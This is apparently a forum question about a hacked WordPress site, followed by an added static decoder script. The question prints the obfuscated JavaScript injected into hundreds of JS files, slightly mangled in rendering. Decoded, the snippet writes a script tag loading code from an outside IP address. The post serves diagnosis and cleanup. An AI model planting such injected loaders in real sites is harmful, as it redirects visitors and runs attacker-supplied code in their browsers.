Code looks like malware, but I am unable to understand how it works

First of all, sorry if this question doesn't seem to fit on this platform; I am confused myself. (Please let me know if it relates to another platform, and I will post there.)

I got a client website (WordPress), and he said that his site is hacked: when he opens any website link, it is redirected to different unwanted links and the website never opens. We need to remove all the malware code and make the site work.

So I uploaded multiple malware-scanning plugins and scanned the whole public_html folder (with the help of the plugins, as well as manually checking the files in each and every folder). Now I got this:

var _0xaae8=["","x6Ax6Fx69x6E","x72x65x76x65x72x73x65","x73x70x6Cx69x74","x3Ex74x70x69x72x63x73x2Fx3Cx3Ex22x73x6Ax2Ex79x72x65x75x71x6Ax2Fx38x37x2Ex36x31x31x2Ex39x34x32x2Ex34x33x31x2Fx2Fx3Ax70x74x74x68x22x3Dx63x72x73x20x74x70x69x72x63x73x3C","x77x72x69x74x65"];document_0xaae8[5]

The code is added to almost all JS files of that WordPress website. (It's about 600 files in all, because it's shared hosting with more than 10 big projects there.)

Now I have the following questions:

1. How was this code added to all the JS files? (Manually editing 600 files is not a logical answer.)

2. What is the functionality of this code? (What is it going to do?)

3. How does someone get access to this many files? (The client says that he never shared any details with anyone.)

I tried to decode this code (base64_decode) but was unable to find anything useful.

Note:

When I removed this code from all files, the sites started working properly.

Please let me know if any other details are required. Thanks.
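
The strings in the snippet above are hex character escapes, not base64, so they can be decoded statically without running the code. The following is an added example, not part of the original post: it reads the string table as text, decodes it, and reports which script URL the table hides. It assumes the infected files carry `\x` escapes that the page rendering dropped, and that the largest entry is the markup handed to the decoded `split`/`reverse`/`join`/`write` names (the call expression itself is cut off on the page); `analyze` and `decodeEscapes` are names introduced here.

```javascript
// Static decoder for the "_0x...." string-table obfuscation in the question.
// The source is handled as text only; nothing here evaluates it.
// SAMPLE: the array from the question with "\x" escapes restored (assumption:
// the page rendering dropped the backslashes). The call expression after the
// array is cut off on the page, so it is not included.
const SAMPLE = String.raw`var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];`;

// A quoted JS string literal, allowing backslash escapes inside it.
const STR = String.raw`"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'`;
// "var _0xNNNN = [ <string literals> ]": group 1 is the name, group 2 the body.
const TABLE_RE = new RegExp(
  String.raw`var\s+(_0x[0-9a-f]+)\s*=\s*\[((?:\s*(?:${STR})\s*,?)*)\s*\]`, "i");

// Turn \xNN and \uNNNN escapes into characters without using eval().
function decodeEscapes(literal) {
  return literal.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Returns null when no string table is present, otherwise what it decodes to.
function analyze(source) {
  const m = TABLE_RE.exec(source);
  if (!m) return null;
  const entries = (m[2].match(new RegExp(STR, "g")) || [])
    .map((lit) => decodeEscapes(lit.slice(1, -1)));
  // Short alphabetic entries are the method names the obfuscated code looks up.
  const methods = entries.filter((e) => /^[A-Za-z]+$/.test(e));
  // Heuristic (assumption): the longest remaining entry is the hidden markup.
  let markup = entries.filter((e) => e && !methods.includes(e))
    .sort((a, b) => b.length - a.length)[0] || "";
  // The table names "reverse", so the markup is stored back to front.
  if (methods.includes("reverse")) markup = [...markup].reverse().join("");
  const srcRe = /<script[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const scriptSrc = [...markup.matchAll(srcRe)].map((x) => x[1]);
  return { name: m[1], methods, markup, scriptSrc };
}

console.log(analyze(SAMPLE));
```

Running `analyze` over the contents of each `.js` file flags the infected ones (non-null result) and lists the external script each would load, which can then be searched for in server logs.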
